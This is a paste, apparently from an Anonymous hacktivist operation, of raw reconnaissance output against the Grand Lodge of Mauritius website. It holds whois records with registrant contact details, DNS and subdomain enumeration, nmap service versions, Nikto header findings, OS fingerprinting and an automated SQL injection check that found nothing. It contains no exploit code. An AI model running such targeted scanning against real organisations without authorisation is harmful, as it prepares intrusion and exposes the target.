Anonymous JTSEC #OPkilluminatie full recon #18

a guest Apr 16th, 2018 2,910 Never
  1. #######################################################################################################################################
  2. Hostname    www.glmasonica.com      ISP     Savvis (AS3561)
  3. Continent   North America       Flag    
  4. US
  5. Country     United States       Country Code    US (USA)
  6. Region  MA      Local time  15 Apr 2018 21:43 EDT
  7. Metropolis*     Boston          Postal Code     02451
  8. City    Waltham         Latitude    42.403
  9. IP Address  192.252.149.45      Longitude   -71.259
  10. #######################################################################################################################################
  11. HostIP:192.252.149.45
  12. HostName:glmasonica.com
  13.  
  14. Gathered Inet-whois information for 192.252.149.45
  15. ---------------------------------------------------------------------------------------------------------------------------------------
  16.  
  17.  
  18. inetnum:        192.251.231.0 - 192.255.255.255
  19. netname:        NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
  20. descr:          IPv4 address block not managed by the RIPE NCC
  21. remarks:        ------------------------------------------------------
  22. remarks:
  23. remarks:        You can find the whois server to query, or the
  24. remarks:        IANA registry to query on this web page:
  25. remarks:        http://www.iana.org/assignments/ipv4-address-space
  26. remarks:
  27. remarks:        You can access databases of other RIRs at:
  28. remarks:
  29. remarks:        AFRINIC (Africa)
  30. remarks:        http://www.afrinic.net/ whois.afrinic.net
  31. remarks:
  32. remarks:        APNIC (Asia Pacific)
  33. remarks:        http://www.apnic.net/ whois.apnic.net
  34. remarks:
  35. remarks:        ARIN (Northern America)
  36. remarks:        http://www.arin.net/  whois.arin.net
  37. remarks:
  38. remarks:        LACNIC (Latin America and the Carribean)
  39. remarks:        http://www.lacnic.net/ whois.lacnic.net
  40. remarks:
  41. remarks:        IANA IPV4 Recovered Address Space
  42. remarks:        http://www.iana.org/assignments/ipv4-recovered-address-space/ipv4-recovered-address-space.xhtml
  43. remarks:
  44. remarks:        ------------------------------------------------------
  45. country:        EU # Country is really world wide
  46. admin-c:        IANA1-RIPE
  47. tech-c:         IANA1-RIPE
  48. status:         ALLOCATED UNSPECIFIED
  49. mnt-by:         RIPE-NCC-HM-MNT
  50. mnt-lower:      RIPE-NCC-HM-MNT
  51. mnt-routes:     RIPE-NCC-RPSL-MNT
  52. created:        2018-03-02T09:54:33Z
  53. last-modified:  2018-03-02T09:54:33Z
  54. source:         RIPE
  55.  
  56. role:           Internet Assigned Numbers Authority
  57. address:        see http://www.iana.org.
  58. admin-c:        IANA1-RIPE
  59. tech-c:         IANA1-RIPE
  60. nic-hdl:        IANA1-RIPE
  61. remarks:        For more information on IANA services
  62. remarks:        go to IANA web site at http://www.iana.org.
  63. mnt-by:         RIPE-NCC-MNT
  64. created:        1970-01-01T00:00:00Z
  65. last-modified:  2001-09-22T09:31:27Z
  66. source:         RIPE # Filtered
  67.  
  68. % This query was served by the RIPE Database Query Service version 1.91.1 (WAGYU)
  69.  
  70.  
  71.  
  72. Gathered Inic-whois information for glmasonica.com
  73. ---------------------------------------------------------------------------------------------------------------------------------------
  74.    Domain Name: GLMASONICA.COM
  75.    Registry Domain ID: 1639647625_DOMAIN_COM-VRSN
  76.    Registrar WHOIS Server: whois.enom.com
  77.    Registrar URL: http://www.enom.com
  78.    Updated Date: 2018-02-09T11:03:06Z
  79.    Creation Date: 2011-02-11T08:34:04Z
  80.    Registry Expiry Date: 2019-02-11T08:34:04Z
  81.    Registrar: eNom, Inc.
  82.    Registrar IANA ID: 48
  83.    Registrar Abuse Contact Email:
  84.    Registrar Abuse Contact Phone:
  85.    Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
  86.    Name Server: NS1.SERVER308.COM
  87.    Name Server: NS2.SERVER308.COM
  88.    DNSSEC: unsigned
  89.    URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  90. >>> Last update of whois database: 2018-04-16T01:46:24Z <<<
  91.  
  92. For more information on Whois status codes, please visit https://icann.org/epp
  93.  
  94. NOTICE: The expiration date displayed in this record is the date the
  95. registrar's sponsorship of the domain name registration in the registry is
  96. currently set to expire. This date does not necessarily reflect the expiration
  97. date of the domain name registrant's agreement with the sponsoring
  98. registrar.  Users may consult the sponsoring registrar's Whois database to
  99. view the registrar's reported date of expiration for this registration.
  100.  
  101. TERMS OF USE: You are not authorized to access or query our Whois
  102. database through the use of electronic processes that are high-volume and
  103. automated except as reasonably necessary to register domain names or
  104. modify existing registrations; the Data in VeriSign Global Registry
  105. Services' ("VeriSign") Whois database is provided by VeriSign for
  106. information purposes only, and to assist persons in obtaining information
  107. about or related to a domain name registration record. VeriSign does not
  108. guarantee its accuracy. By submitting a Whois query, you agree to abide
  109. by the following terms of use: You agree that you may use this Data only
  110. for lawful purposes and that under no circumstances will you use this Data
  111. to: (1) allow, enable, or otherwise support the transmission of mass
  112. unsolicited, commercial advertising or solicitations via e-mail, telephone,
  113. or facsimile; or (2) enable high volume, automated, electronic processes
  114. that apply to VeriSign (or its computer systems). The compilation,
  115. repackaging, dissemination or other use of this Data is expressly
  116. prohibited without the prior written consent of VeriSign. You agree not to
  117. use electronic processes that are automated and high-volume to access or
  118. query the Whois database except as reasonably necessary to register
  119. domain names or modify existing registrations. VeriSign reserves the right
  120. to restrict your access to the Whois database in its sole discretion to ensure
  121. operational stability.  VeriSign may restrict or terminate your access to the
  122. Whois database for failure to abide by these terms of use. VeriSign
  123. reserves the right to modify these terms at any time.
  124.  
  125. The Registry database contains ONLY .COM, .NET, .EDU domains and
  126. Registrars.
  127.  
  128. Gathered Netcraft information for glmasonica.com
  129. ---------------------------------------------------------------------------------------------------------------------------------------
  130.  
  131. Retrieving Netcraft.com information for glmasonica.com
  132. Netcraft.com Information gathered
  133.  
  134. Gathered Subdomain information for glmasonica.com
  135. --------------------------------------------------------------------------------------------------------------------------------------
  136. Searching Google.com:80...
  137. HostName:www.glmasonica.com
  138. HostIP:192.252.149.45
  139. Searching Altavista.com:80...
  140. Found 1 possible subdomain(s) for host glmasonica.com, Searched 0 pages containing 0 results
  141.  
  142. Gathered E-Mail information for glmasonica.com
  143. ---------------------------------------------------------------------------------------------------------------------------------------
  144. Searching Google.com:80...
  145. Searching Altavista.com:80...
  146. Found 0 E-Mail(s) for host glmasonica.com, Searched 0 pages containing 0 results
  147.  
  148. Gathered TCP Port information for 192.252.149.45
  149. ---------------------------------------------------------------------------------------------------------------------------------------
  150.  
  151.  Port       State
  152.  
  153. 21/tcp      open
  154. 22/tcp      open
  155. 80/tcp      open
  156. 143/tcp     open
  157.  
  158. Portscan Finished: Scanned 150 ports, 0 ports were in state closed
  159. #######################################################################################################################################
  160. [i] Scanning Site: http://glmasonica.com
  161.  
  162.  
  163.  
  164. B A S I C   I N F O
  165. =======================================================================================================================================
  166.  
  167.  
  168. [+] Site Title: Grande Loge De Maurice
  169. [+] IP address: 192.252.149.45
  170. [+] Web Server: Apache
  171. [+] CMS: Could Not Detect
  172. [+] Cloudflare: Not Detected
  173. [+] Robots File: Could NOT Find robots.txt!
  174.  
  175.  
  176.  
  177.  
  178. W H O I S   L O O K U P
  179. =======================================================================================================================================
  180.  
  181.        Domain Name: GLMASONICA.COM
  182.    Registry Domain ID: 1639647625_DOMAIN_COM-VRSN
  183.    Registrar WHOIS Server: whois.enom.com
  184.    Registrar URL: http://www.enom.com
  185.    Updated Date: 2018-02-09T11:03:06Z
  186.    Creation Date: 2011-02-11T08:34:04Z
  187.    Registry Expiry Date: 2019-02-11T08:34:04Z
  188.    Registrar: eNom, Inc.
  189.    Registrar IANA ID: 48
  190.    Registrar Abuse Contact Email:
  191.    Registrar Abuse Contact Phone:
  192.    Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
  193.    Name Server: NS1.SERVER308.COM
  194.    Name Server: NS2.SERVER308.COM
  195.    DNSSEC: unsigned
  196.    URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  197. >>> Last update of whois database: 2018-04-16T01:46:24Z <<<
  198.  
  199. For more information on Whois status codes, please visit https://icann.org/epp
  200.  
  201.  
  202.  
  203. The Registry database contains ONLY .COM, .NET, .EDU domains and
  204. Registrars.
  205.  
  206.  
  207.  
  208.  
  209. G E O  I P  L O O K  U P
  210. =======================================================================================================================================
  211.  
  212. [i] IP Address: 192.252.149.45
  213. [i] Country: US
  214. [i] State: Massachusetts
  215. [i] City: Waltham
  216. [i] Latitude: 42.403000
  217. [i] Longitude: -71.259003
  218.  
  219.  
  220.  
  221.  
  222. H T T P   H E A D E R S
  223. =======================================================================================================================================
  224.  
  225.  
  226. [i]  HTTP/1.1 200 OK
  227. [i]  Date: Mon, 16 Apr 2018 01:46:40 GMT
  228. [i]  Server: Apache
  229. [i]  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  230. [i]  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  231. [i]  Pragma: no-cache
  232. [i]  Set-Cookie: projector=13fe947520f28f594bf9d7e975093f0c; path=/
  233. [i]  Connection: close
  234. [i]  Content-Type: text/html
  235.  
  236.  
  237.  
  238.  
  239. D N S   L O O K U P
  240. =======================================================================================================================================
  241.  
  242. ;; Truncated, retrying in TCP mode.
  243. glmasonica.com.     2560    IN  SOA ns1.server308.com. hostmaster.glmasonica.com. 1523828373 16384 2048 1048576 2560
  244. glmasonica.com.     25920   IN  NS  ns1.server308.com.
  245. glmasonica.com.     25920   IN  NS  ns2.server308.com.
  246. glmasonica.com.     14400   IN  MX  0 mail.glmasonica.com.
  247. glmasonica.com.     14400   IN  A   192.252.149.45
  248.  
  249.  
  250.  
  251.  
  252. S U B N E T   C A L C U L A T I O N
  253. =======================================================================================================================================
  254.  
  255. Address       = 192.252.149.45
  256. Network       = 192.252.149.45 / 32
  257. Netmask       = 255.255.255.255
  258. Broadcast     = not needed on Point-to-Point links
  259. Wildcard Mask = 0.0.0.0
  260. Hosts Bits    = 0
  261. Max. Hosts    = 1   (2^0 - 0)
  262. Host Range    = { 192.252.149.45 - 192.252.149.45 }
  263.  
  264.  
  265.  
  266. N M A P   P O R T   S C A N
  267. =======================================================================================================================================
  268.  
  269.  
  270. Starting Nmap 7.01 ( https://nmap.org ) at 2018-04-16 01:46 UTC
  271. Nmap scan report for glmasonica.com (192.252.149.45)
  272. Host is up (0.015s latency).
  273. PORT     STATE    SERVICE       VERSION
  274. 21/tcp   open     ftp           ProFTPD
  275. 22/tcp   open     ssh           OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
  276. 23/tcp   filtered telnet
  277. 25/tcp   open     smtp          netqmail smtpd 1.04
  278. 80/tcp   open     http          Apache httpd
  279. 110/tcp  open     pop3          Dovecot pop3d
  280. 143/tcp  open     imap          Dovecot imapd
  281. 443/tcp  open     ssl/ssl       Apache httpd (SSL-only mode)
  282. 445/tcp  filtered microsoft-ds
  283. 3389/tcp filtered ms-wbt-server
  284. Service Info: Host: 192.252.149.45; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
  285.  
  286. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  287. Nmap done: 1 IP address (1 host up) scanned in 19.01 seconds
  288.  
  289. #######################################################################################################################################
  290. [!] IP Address : 192.252.149.45
  291. [!] Server: Apache
  292. [+] Clickjacking protection is not in place.
  293. [+] Operating System : Debian"
  294.   },
  295.   "993": {
  296.     "imaps": {
  297.       "tls": {
  298.         "tls": {
  299.           "server_key_exchange": {
  300.             "ecdh_params": {
  301.               "curve_id": {
  302.                 "id": 23,
  303.                 "name": "secp256r1"
  304.               }
  305.             }
  306.           },
  307.           "certificate": {
  308.             "parsed": {
  309.               "fingerprint_sha1": "5e5415f6edece4cb2c1913c05b07a33a89fbb4d0",
  310.               "tbs_noct_fingerprint": "cab5cdc850c8153ea3bc4a1b31f2d48b54af1dfd6f4228c1233652effbba14a9",
  311.               "subj
  312. [!] www.glmasonica.com doesn't seem to use a CMS
  313. [+] Honeypot Probabilty: 30%
  314. ----------------------------------------
  315. [~] Trying to gather whois information for www.glmasonica.com
  316. [+] Whois information found
  317. [-] Unable to build response, visit https://who.is/whois/www.glmasonica.com
  318. ----------------------------------------
  319. PORT     STATE    SERVICE       VERSION
  320. 21/tcp   open     ftp           ProFTPD
  321. 22/tcp   open     ssh           OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
  322. 23/tcp   filtered telnet
  323. 25/tcp   open     smtp          netqmail smtpd 1.04
  324. 80/tcp   open     http          Apache httpd
  325. 110/tcp  open     pop3          Dovecot pop3d
  326. 143/tcp  open     imap          Dovecot imapd
  327. 443/tcp  open     ssl/http      Apache httpd
  328. 445/tcp  filtered microsoft-ds
  329. 3389/tcp filtered ms-wbt-server
  330. ----------------------------------------
  331.  
  332. [+] DNS Records
  333.  
  334. [+] Host Records (A)
  335. www.glmasonica.comHTTP: (192.252.149.45) AS3561 Savvis United States
  336.  
  337. [+] TXT Records
  338.  
  339. [+] DNS Map: https://dnsdumpster.com/static/map/glmasonica.com.png
  340.  
  341. [>] Initiating 3 intel modules
  342. [>] Loading Alpha module (1/3)
  343. [>] Beta module deployed (2/3)
  344. [>] Gamma module initiated (3/3)
  345.  
  346.  
  347. [+] Emails found:
  348. ------------------
  349. pixel-1523843228738161-web-@www.glmasonica.com
  350. pixel-1523843231359027-web-@www.glmasonica.com
  351. No hosts found
  352. [+] Virtual hosts:
  353. -----------------
  354. [~] Crawling the target for fuzzable URLs
  355. [+] Found 2 fuzzable URLs
  356. http://www.glmasonica.com//introduction.php?l=fr
  357. [~] Using SQLMap api to check for SQL injection vulnerabilities. Don't worry we are using an online service and it doesn't depend on your internet connection. This scan will take 2-3 minutes.
  358. [-] None of parameters is vulnerable to SQL injection
  359. [+] These are the URLs having parameters:
  360. http://www.glmasonica.com//introduction.php?l=fr
  361. http://www.glmasonica.com//introduction.php?l=en
  362.  
  363. #######################################################################################################################################
  364. [*] Processing domain glmasonica.com
  365. [+] Getting nameservers
  366. 192.252.150.21 - ns2.server308.com
  367. 192.252.149.21 - ns1.server308.com
  368. [-] Zone transfer failed
  369.  
  370. [+] MX records found, added to target list
  371. 0 mail.glmasonica.com.
  372.  
  373. [+] Wildcard domain found - 192.252.149.45
  374. [*] Scanning glmasonica.com for A records
  375. #######################################################################################################################################
  376. Original*      glmasonica.com     192.252.149.45 NS:ns1.server308.com MX:mail.glmasonica.com
  377. Subdomain      gl.masonica.com    207.148.248.143
  378. Subdomain      glm.asonica.com    66.96.132.120
  379. Subdomain      glma.sonica.com    208.91.197.27
  380. #######################################################################################################################################
  381. Ip Address  Status  Type    Domain Name         Server
  382. ----------  ------  ----    -----------         ------
  383. 192.252.149.45  400     host    ftp_.glmasonica.com     Apache
  384. 192.252.149.45          host    mta.glmasonica.com     
  385. 192.252.149.45          host    mtu.glmasonica.com     
  386. 192.252.149.45          host    mu.glmasonica.com      
  387. 192.252.149.45          host    multimedia.glmasonica.com  
  388. 192.252.149.45          host    music.glmasonica.com       
  389. 192.252.149.45          host    mv.glmasonica.com      
  390. 192.252.149.45          host    mw.glmasonica.com      
  391. 192.252.149.45          host    mx.glmasonica.com      
  392. 192.252.149.45          host    mx1.glmasonica.com     
  393. 192.252.149.45          host    my.glmasonica.com      
  394. 192.252.149.45          host    mysql.glmasonica.com       
  395. 192.252.149.45          host    mysql0.glmasonica.com      
  396. 192.252.149.45          host    mysql01.glmasonica.com     
  397. 192.252.149.45  400     host    ns_.glmasonica.com      Apache
  398. 192.252.149.45          host    problemtracker.glmasonica.com  
  399. 192.252.149.45          host    products.glmasonica.com    
  400. 192.252.149.45          host    profiles.glmasonica.com    
  401. 192.252.149.45          host    project.glmasonica.com     
  402. 192.252.149.45          host    projects.glmasonica.com    
  403. 192.252.149.45          host    promo.glmasonica.com       
  404. 192.252.149.45          host    prueba.glmasonica.com      
  405. 192.252.149.45          host    pruebas.glmasonica.com     
  406. 192.252.149.45          host    ps.glmasonica.com      
  407. 192.252.149.45          host    psi.glmasonica.com     
  408. 192.252.149.45          host    pss.glmasonica.com     
  409. 192.252.149.45          host    pt.glmasonica.com      
  410. 192.252.149.45          host    pub.glmasonica.com     
  411. 192.252.149.45          host    public.glmasonica.com      
  412. 192.252.149.45          host    pubs.glmasonica.com    
  413. 192.252.149.45          host    purple.glmasonica.com      
  414. 192.252.149.45          host    read.glmasonica.com    
  415. 192.252.149.45          host    realserver.glmasonica.com  
  416. 192.252.149.45          host    recruiting.glmasonica.com  
  417. 192.252.149.45          host    red.glmasonica.com     
  418. 192.252.149.45          host    redhat.glmasonica.com      
  419. 192.252.149.45          host    ref.glmasonica.com     
  420. 192.252.149.45          host    reference.glmasonica.com   
  421. 192.252.149.45          host    reg.glmasonica.com     
  422. 192.252.149.45          host    register.glmasonica.com    
  423. 192.252.149.45          host    rtr.glmasonica.com     
  424. 192.252.149.45          host    rtr1.glmasonica.com    
  425. 192.252.149.45          host    ru.glmasonica.com      
  426. 192.252.149.45          host    s1.glmasonica.com      
  427. 192.252.149.45          host    s2.glmasonica.com      
  428. 192.252.149.45          host    sa.glmasonica.com      
  429. 192.252.149.45          host    sac.glmasonica.com     
  430. 192.252.149.45          host    sacramento.glmasonica.com  
  431. 192.252.149.45  302     host    webmail.glmasonica.com      Apache
  432. 192.252.149.45  200     host    www.glmasonica.com      Apache
  433. 192.252.149.45  400     host    www_.glmasonica.com     Apache
  434. ######################################################################################################################################
  435. -------------------------------------------------------------------------------------------------------------------------------------
  436. + Target IP:          192.252.149.45
  437. + Target Hostname:    glmasonica.com
  438. + Target Port:        80
  439. + Start Time:         2018-04-15 22:09:38 (GMT-4)
  440. ---------------------------------------------------------------------------------------------------------------------------------------
  441. + Server: Apache
  442. + Cookie projector created without the httponly flag
  443. + The anti-clickjacking X-Frame-Options header is not present.
  444. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  445. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  446. + Uncommon header 'tcn' found, with contents: choice
  447. + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
  448. + ERROR: Error limit (20) reached for host, giving up. Last error:
  449. + Scan terminated:  0 error(s) and 6 item(s) reported on remote host
  450. + End Time:           2018-04-15 22:23:52 (GMT-4) (854 seconds)
  451. ---------------------------------------------------------------------------------------------------------------------------------------
  452. + 1 host(s) tested
  453. #######################################################################################################################################
  454. Server:     10.211.254.254
  455. Address:    10.211.254.254#53
  456.  
  457. Non-authoritative answer:
  458. Name:   glmasonica.com
  459. Address: 192.252.149.45
  460.  
  461. glmasonica.com has address 192.252.149.45
  462. glmasonica.com mail is handled by 0 mail.glmasonica.com.
  463. #######################################################################################################################################
  464. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
  465.  
  466. [+] Target is glmasonica.com
  467. [+] Loading modules.
  468. [+] Following modules are loaded:
  469. [x] [1] ping:icmp_ping  -  ICMP echo discovery module
  470. [x] [2] ping:tcp_ping  -  TCP-based ping discovery module
  471. [x] [3] ping:udp_ping  -  UDP-based ping discovery module
  472. [x] [4] infogather:ttl_calc  -  TCP and UDP based TTL distance calculation
  473. [x] [5] infogather:portscan  -  TCP and UDP PortScanner
  474. [x] [6] fingerprint:icmp_echo  -  ICMP Echo request fingerprinting module
  475. [x] [7] fingerprint:icmp_tstamp  -  ICMP Timestamp request fingerprinting module
  476. [x] [8] fingerprint:icmp_amask  -  ICMP Address mask request fingerprinting module
  477. [x] [9] fingerprint:icmp_port_unreach  -  ICMP port unreachable fingerprinting module
  478. [x] [10] fingerprint:tcp_hshake  -  TCP Handshake fingerprinting module
  479. [x] [11] fingerprint:tcp_rst  -  TCP RST fingerprinting module
  480. [x] [12] fingerprint:smb  -  SMB fingerprinting module
  481. [x] [13] fingerprint:snmp  -  SNMPv2c fingerprinting module
  482. [+] 13 modules registered
  483. [+] Initializing scan engine
  484. [+] Running scan engine
  485. [-] ping:tcp_ping module: no closed/open TCP ports known on 192.252.149.45. Module test failed
  486. [-] ping:udp_ping module: no closed/open UDP ports known on 192.252.149.45. Module test failed
  487. [-] No distance calculation. 192.252.149.45 appears to be dead or no ports known
  488. [+] Host: 192.252.149.45 is up (Guess probability: 50%)
  489. [+] Target: 192.252.149.45 is alive. Round-Trip Time: 0.47967 sec
  490. [+] Selected safe Round-Trip Time value is: 0.95934 sec
  491. [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
  492. [-] fingerprint:smb need either TCP port 139 or 445 to run
  493. [+] Primary guess:
  494. [+] Host 192.252.149.45 Running OS:  (Guess probability: 91%)
  495. [+] Other guesses:
  496. [+] Host 192.252.149.45 Running OS:  (Guess probability: 91%)
  497. [+] Host 192.252.149.45 Running OS:  (Guess probability: 91%)
  498. [+] Host 192.252.149.45 Running OS:  (Guess probability: 91%)
  499. [+] Host 192.252.149.45 Running OS:  (Guess probability: 91%)
  500. [+] Host 192.252.149.45 Running OS:  (Guess probability: 91%)
  501. [+] Host 192.252.149.45 Running OS:  (Guess probability: 91%)
  502. [+] Host 192.252.149.45 Running OS:  (Guess probability: 91%)
  503. [+] Host 192.252.149.45 Running OS:  (Guess probability: 91%)
  504. [+] Host 192.252.149.45 Running OS:  (Guess probability: 91%)
  505. [+] Cleaning up scan engine
  506. [+] Modules deinitialized
  507. [+] Execution completed.
  508. #######################################################################################################################################
  509.    Domain Name: GLMASONICA.COM
  510.    Registry Domain ID: 1639647625_DOMAIN_COM-VRSN
  511.    Registrar WHOIS Server: whois.enom.com
  512.    Registrar URL: http://www.enom.com
  513.    Updated Date: 2018-02-09T11:03:06Z
  514.    Creation Date: 2011-02-11T08:34:04Z
  515.    Registry Expiry Date: 2019-02-11T08:34:04Z
  516.    Registrar: eNom, Inc.
  517.    Registrar IANA ID: 48
  518.    Registrar Abuse Contact Email:
  519.    Registrar Abuse Contact Phone:
  520.    Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
  521.    Name Server: NS1.SERVER308.COM
  522.    Name Server: NS2.SERVER308.COM
  523.    DNSSEC: unsigned
  524.    URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  525. >>> Last update of whois database: 2018-04-16T02:31:28Z <<<
  526.  
  527. For more information on Whois status codes, please visit https://icann.org/epp
  528.  
  529. NOTICE: The expiration date displayed in this record is the date the
  530. registrar's sponsorship of the domain name registration in the registry is
  531. currently set to expire. This date does not necessarily reflect the expiration
  532. date of the domain name registrant's agreement with the sponsoring
  533. registrar.  Users may consult the sponsoring registrar's Whois database to
  534. view the registrar's reported date of expiration for this registration.
  535.  
  536. TERMS OF USE: You are not authorized to access or query our Whois
  537. database through the use of electronic processes that are high-volume and
  538. automated except as reasonably necessary to register domain names or
  539. modify existing registrations; the Data in VeriSign Global Registry
  540. Services' ("VeriSign") Whois database is provided by VeriSign for
  541. information purposes only, and to assist persons in obtaining information
  542. about or related to a domain name registration record. VeriSign does not
  543. guarantee its accuracy. By submitting a Whois query, you agree to abide
  544. by the following terms of use: You agree that you may use this Data only
  545. for lawful purposes and that under no circumstances will you use this Data
  546. to: (1) allow, enable, or otherwise support the transmission of mass
  547. unsolicited, commercial advertising or solicitations via e-mail, telephone,
  548. or facsimile; or (2) enable high volume, automated, electronic processes
  549. that apply to VeriSign (or its computer systems). The compilation,
  550. repackaging, dissemination or other use of this Data is expressly
  551. prohibited without the prior written consent of VeriSign. You agree not to
  552. use electronic processes that are automated and high-volume to access or
  553. query the Whois database except as reasonably necessary to register
  554. domain names or modify existing registrations. VeriSign reserves the right
  555. to restrict your access to the Whois database in its sole discretion to ensure
  556. operational stability.  VeriSign may restrict or terminate your access to the
  557. Whois database for failure to abide by these terms of use. VeriSign
  558. reserves the right to modify these terms at any time.
  559.  
  560. The Registry database contains ONLY .COM, .NET, .EDU domains and
  561. Registrars.
  562.  
  563.  
  564. Domain Name: GLMASONICA.COM
  565. Registry Domain ID: 1639647625_DOMAIN_COM-VRSN
  566. Registrar WHOIS Server: whois.enom.com
  567. Registrar URL: www.enom.com
  568. Updated Date: 2018-02-06T04:16:52.00Z
  569. Creation Date: 2011-02-11T08:34:00.00Z
  570. Registrar Registration Expiration Date: 2019-02-11T08:34:04.00Z
  571. Registrar: ENOM, INC.
  572. Registrar IANA ID: 48
  573. Reseller: SURESUPPORT.COM
  574. Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
  575. Registry Registrant ID:
  576. Registrant Name: GRAND LODGE OF MAURITIUS GRAND LODGE OF MAURITIUS
  577. Registrant Organization: GRAND LODGE OF MAURITIUS
  578. Registrant Street: BARACHOIS ESTATE
  579. Registrant Street: NA
  580. Registrant City: TAMARIN
  581. Registrant State/Province: NA
  582. Registrant Postal Code: 0000
  583. Registrant Country: MU
  584. Registrant Phone: +230.4834439
  585. Registrant Phone Ext:
  586. Registrant Fax:
  587. Registrant Fax Ext:
  588. Registrant Email: INFO@IMSMAURITIUS.COM
  589. Registry Admin ID:
  590. Admin Name: GRAND LODGE OF MAURITIUS GRAND LODGE OF MAURITIUS
  591. Admin Organization: GRAND LODGE OF MAURITIUS
  592. Admin Street: BARACHOIS ESTATE
  593. Admin Street: NA
  594. Admin City: TAMARIN
  595. Admin State/Province: NA
  596. Admin Postal Code: 0000
  597. Admin Country: MU
  598. Admin Phone: +230.4834439
  599. Admin Phone Ext:
  600. Admin Fax:
  601. Admin Fax Ext:
  602. Admin Email: INFO@IMSMAURITIUS.COM
  603. Registry Tech ID:
  604. Tech Name: GRAND LODGE OF MAURITIUS GRAND LODGE OF MAURITIUS
  605. Tech Organization: GRAND LODGE OF MAURITIUS
  606. Tech Street: BARACHOIS ESTATE
  607. Tech Street: NA
  608. Tech City: TAMARIN
  609. Tech State/Province: NA
  610. Tech Postal Code: 0000
  611. Tech Country: MU
  612. Tech Phone: +230.4834439
  613. Tech Phone Ext:
  614. Tech Fax:
  615. Tech Fax Ext:
  616. Tech Email: INFO@IMSMAURITIUS.COM
  617. Name Server: NS1.SERVER308.COM
  618. Name Server: NS2.SERVER308.COM
  619. DNSSEC: unSigned
  620. Registrar Abuse Contact Email: abuse@enom.com
  621. Registrar Abuse Contact Phone: +1.4259744689
  622. URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
  623. >>> Last update of WHOIS database: 2018-02-06T04:16:52.00Z <<<
  624.  
  625. For more information on Whois status codes, please visit https://icann.org/epp
  626.  
  627.  
  647. #######################################################################################################################################
  648.  
  649. ; <<>> DiG 9.11.3-1-Debian <<>> -x glmasonica.com
  650. ;; global options: +cmd
  651. ;; Got answer:
  652. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 42747
  653. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
  654.  
  655. ;; OPT PSEUDOSECTION:
  656. ; EDNS: version: 0, flags:; udp: 4096
  657. ;; QUESTION SECTION:
  658. ;com.glmasonica.in-addr.arpa.   IN  PTR
  659.  
  660. ;; AUTHORITY SECTION:
  661. in-addr.arpa.       604 IN  SOA b.in-addr-servers.arpa. nstld.iana.org. 2018013344 1800 900 604800 3600
  662.  
  663. ;; Query time: 404 msec
  664. ;; SERVER: 10.211.254.254#53(10.211.254.254)
  665. ;; WHEN: Sun Apr 15 22:31:47 EDT 2018
  666. ;; MSG SIZE  rcvd: 124
  667.  
  668. dnsenum VERSION:1.2.4
  669.  
  670. -----   glmasonica.com   -----
  671.  
  672.  
  673. Host's addresses:
  674. __________________
  675.  
  676. glmasonica.com.                          11683    IN    A        192.252.149.45
  677.  
  678.  
  679. Wildcard detection using: nzifomoigzmu
  680. _______________________________________
  681.  
  682. nzifomoigzmu.glmasonica.com.             14400    IN    A        192.252.149.45
  683.  
  684.  
  685. !!!!!!!!!!!!!!!!!!!!!!!!!!!!
  686.  
  687.  Wildcards detected, all subdomains will point to the same IP address
  688.  Omitting results containing 192.252.149.45.
  689.  Maybe you are using OpenDNS servers.
  690.  
  691. !!!!!!!!!!!!!!!!!!!!!!!!!!!!
  692.  
  693.  
  694. Name Servers:
  695. ______________
  696.  
  697. ns2.server308.com.                       12328    IN    A        192.252.150.21
  698. ns1.server308.com.                       12329    IN    A        192.252.149.21
  699.  
  700.  
  701. Mail (MX) Servers:
  702. ___________________
  703.  
  704. mail.glmasonica.com.                     12352    IN    A        192.252.149.45
  705.  
  706.  
  707. Trying Zone Transfers and getting Bind Versions:
  708. _________________________________________________
  709.  
  710.  
  711. Trying Zone Transfer for glmasonica.com on ns2.server308.com ...
  712.  
  713. Trying Zone Transfer for glmasonica.com on ns1.server308.com ...
  714.  
  715. brute force file not specified, bay.
  716. ######################################################################################################################################
  717. [-] Enumerating subdomains now for glmasonica.com
  718. [-] verbosity is enabled, will show the subdomains results in realtime
  719. [-] Searching now in Baidu..
  720. [-] Searching now in Yahoo..
  721. [-] Searching now in Google..
  722. [-] Searching now in Bing..
  723. [-] Searching now in Ask..
  724. [-] Searching now in Netcraft..
  725. [-] Searching now in DNSdumpster..
  726. [-] Searching now in Virustotal..
  727. [-] Searching now in ThreatCrowd..
  728. [-] Searching now in SSL Certificates..
  729. [-] Searching now in PassiveDNS..
  730. Virustotal: mail.glmasonica.com
  731. Virustotal: www.glmasonica.com
  732. DNSdumpster: mail.glmasonica.com
  733. Yahoo: www.glmasonica.com
  734. [-] Saving results to file: /usr/share/sniper/loot/glmasonica.com/domains/domains-glmasonica.com.txt
  735. [-] Total Unique Subdomains Found: 2
  736. www.glmasonica.com
  737. mail.glmasonica.com
  738. #######################################################################################################################################
  739.                            __
  740.   ____ _____ ___  ______ _/ /_____  ____  ___
  741.  / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  742. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / /  __/
  743. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
